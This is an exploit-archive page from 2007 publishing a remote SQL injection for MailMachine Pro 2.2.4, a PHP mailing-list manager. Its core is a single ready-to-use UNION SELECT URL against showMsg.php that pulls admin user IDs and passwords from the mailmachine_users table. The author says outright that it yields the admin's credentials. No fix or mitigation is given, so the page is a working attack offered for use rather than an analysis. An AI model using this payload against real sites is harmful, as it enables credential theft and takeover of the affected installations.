[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MailMachine Pro 2.2.4 Remote SQL Injection Vulnerability
# Published : 2007-12-25
# Author : MhZ91
# Previous Title : RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit
# Next Title : PMOS Help Desk <= 2.4 Remote Command Execution Exploit
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |_______ _____/ |_ /_ |/ |_
| |/ | | _(__ <_/ ___ __ ______ | __
| | | | |/ ___| | /_____/ | || |
|___|___| /__| /______ /___ >__| |___||__|
/______| / /
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Remote Sql Injection
---------------------------------------------------------------
# Author: MhZ91
# Title: MailMachine Pro 2.2.4 - Remote Sql Injection
# Download: http://webgraf.ru/2007/11/27/mailmachine_pro_224.html
# Bug: Remote Sql Injection
# Info: Mail Machine Pro is a professional mailing list manager written in php. This program features a web-based setup wizard, unlimited lists and subscribers, unlimited admins, personalization of newsletters with user data, autoreplies, scheduled mailings, email attachments, link tracking, bounced email management, opt-in/out, optional SMTP sending, mailing lists stats, import/export of subscriber list, automatic backup and restore, real-time message queue and more.
# Visit: http://www.inj3ct-it.org
---------------------------------------------------------------
http://[site]/showMsg.php?id=-1+union+select+1,2,3,4,5,6,concat(user_id,char(58),password),8,9,10+from+mailmachine_users/*
Whit this u get user:password of the admin
I think there is other sql injection xD
Bye.. and visit http://www.inj3ct-it.org !!
---------------------------------------------------------------
# www.Syue.com [2007-12-25]